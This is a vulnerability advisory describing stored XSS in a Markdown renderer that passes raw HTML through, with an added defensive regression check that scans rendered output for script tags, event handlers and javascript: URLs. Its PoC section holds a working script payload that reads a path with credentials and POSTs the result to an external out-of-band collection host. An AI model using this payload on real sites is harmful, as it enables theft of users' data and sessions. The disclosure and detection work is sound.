Summary
A cross-site scripting (XSS) vulnerability exists in the application’s Markdown rendering logic. When user-supplied Markdown content is rendered, embedded raw HTML—including <script> tags—is processed and injected into the resulting page without sanitization, allowing arbitrary JavaScript execution in the context of the affected domain.
Details
An attacker can craft malicious Markdown content containing <script> tags or event handlers (e.g., ). When this Markdown is viewed or previewed, the embedded JavaScript executes in the victim’s browser.
Vulnerable Components
config.js → markdownIt: { html: true } (Lines 26–30)
The Markdown renderer is explicitly configured to allow raw HTML.
lib/markd.js (Lines 33–58)
Renders Markdown content without sanitizing HTML, allowing unsafe tags and attributes to remain in the output.
lib/pages/template.html
The rendered Markdown is injected into the HTML template using <%= markdown %> without sanitization or output encoding.
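The following is an added example, not code from the advisory or from the affected project. It models the effect of the two markdownIt settings named above (html: true passes raw HTML through, html: false escapes it as text) and adds a small regression check that scans rendered output for the constructs that make this XSS possible: script elements, on* event-handler attributes and javascript: URLs. The Markdown sample, the helper names and the simplified heading handling are assumptions; a real deployment would run the check against the actual renderer's output before it reaches the template.

```javascript
// Added example (not part of the original advisory): a regression check for the
// "raw HTML passes through Markdown rendering" condition described above.
// It does not depend on markdown-it; the two render functions below only model
// what the html:true and html:false options do with an inline HTML fragment.

// Constructed sample: a Markdown body carrying raw HTML, as the advisory describes.
// The script body and handler are empty comments so the sample itself does nothing.
const SAMPLE_MARKDOWN = [
  '# Hello',
  '<script>/* constructed sample, does nothing */</script>',
  '<img src=x onerror="/* constructed */">',
].join('\n');

// Output encoding: what markdown-it does with raw HTML when html:false is set,
// and what the template should do with untrusted strings before interpolation.
function escapeHtml(s) {
  return s.replace(/&/g, '&amp;')
          .replace(/</g, '&lt;')
          .replace(/>/g, '&gt;')
          .replace(/"/g, '&quot;')
          .replace(/'/g, '&#39;');
}

// Models the vulnerable configuration (config.js, markdownIt: { html: true }):
// HTML lines are passed through untouched. Heading handling is a minimal stand-in.
function renderRawHtmlAllowed(md) {
  return md.split('\n').map(line =>
    line.startsWith('# ') ? `<h1>${escapeHtml(line.slice(2))}</h1>` : line
  ).join('\n');
}

// Models the corrected configuration (html: false): HTML lines are escaped as text.
function renderRawHtmlEscaped(md) {
  return md.split('\n').map(line =>
    line.startsWith('# ') ? `<h1>${escapeHtml(line.slice(2))}</h1>` : escapeHtml(line)
  ).join('\n');
}

// Detection: scan rendered output for the constructs that enable script execution.
// Returns an array of finding labels; an empty array means nothing matched.
function findActiveContent(html) {
  const checks = [
    ['script-tag', /<script\b/i],
    ['event-handler', /<[^>]*\son\w+\s*=/i],
    ['javascript-url', /\b(?:href|src)\s*=\s*["']?\s*javascript:/i],
  ];
  return checks.filter(([, re]) => re.test(html)).map(([name]) => name);
}

// Stand-alone run: prints the findings for both configurations.
console.log('html:true  ->', findActiveContent(renderRawHtmlAllowed(SAMPLE_MARKDOWN)));
console.log('html:false ->', findActiveContent(renderRawHtmlEscaped(SAMPLE_MARKDOWN)));
```

The regex scan is a cheap CI guard, not a sanitizer: it catches a regression back to raw HTML pass-through but does not replace disabling html in the renderer or encoding the value at the <%= markdown %> interpolation point.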
PoC
Create a pwn.md
# Hello
<script>
fetch('/etc/passwd', { credentials: 'include' })
.then(r => r.text())
.then(t => fetch('https://79evxsw3m08qfyvxluebgl0pyg47szgo.oastify.com/exfil', { method: 'POST', body: t }));
</script>
Open it in a browser.

View the HTTP request in Burp Collaborator.

Impact
Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim’s browser, leading to:
- Session hijacking
- Account takeover
- Credential theft
- Defacement or injection of malicious content
- Exfiltration of sensitive data via API tokens, CSRF tokens, or user information
This affects all users who can view Markdown content within the application.
References